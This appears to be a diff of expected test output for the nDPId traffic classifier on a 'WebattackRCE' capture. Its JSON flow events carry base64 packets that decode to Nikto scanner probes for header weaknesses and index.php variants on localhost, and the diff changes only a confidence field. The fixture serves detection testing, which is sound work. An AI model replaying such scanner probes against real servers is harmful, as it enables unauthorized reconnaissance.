00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":201,"pkt_l4_len":167,"thread_ts_msec":1576420276796,"pkt":"AAAAAAAAAAAAAAAACABFAAC74FpAAEAGW+B\/AAABfwAAAcI0H5AdBth42VHy84AYAED+rwAAAQEICp1m+2SdZvtkR0VUIC4gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBXZWJMb2dpYyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276796,"flow_last_seen":1576420276796,"flow_idle_time":7580000,"flow_min_l4_payload_len":135,"flow_max_l4_payload_len":135,"flow_tot_l4_payload_len":135,"flow_avg_l4_payload_len":135,"midstream":1,"thread_ts_msec":1576420276796,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49716,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1576420276797,"pkt":"AAAAAAAAAAAAAAAACABFAADj87RAAEAGSF5\/AAABfwAAAcI2H5ABU8uetZ1IA4AYAED+1wAAAQEICp1m+2WdZvtlR0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZGVmbGF0ZSwgZ3ppcA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IEJSRUFDSCBUZXN0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276797,"flow_last_seen":1576420276797,"flow_idle_time":7580000,"flow_min_l4_payload_len":175,"flow_max_l4_payload_len":175,"flow_tot_l4_payload_len":175,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1576420276797,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49718,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"} -00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7580000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 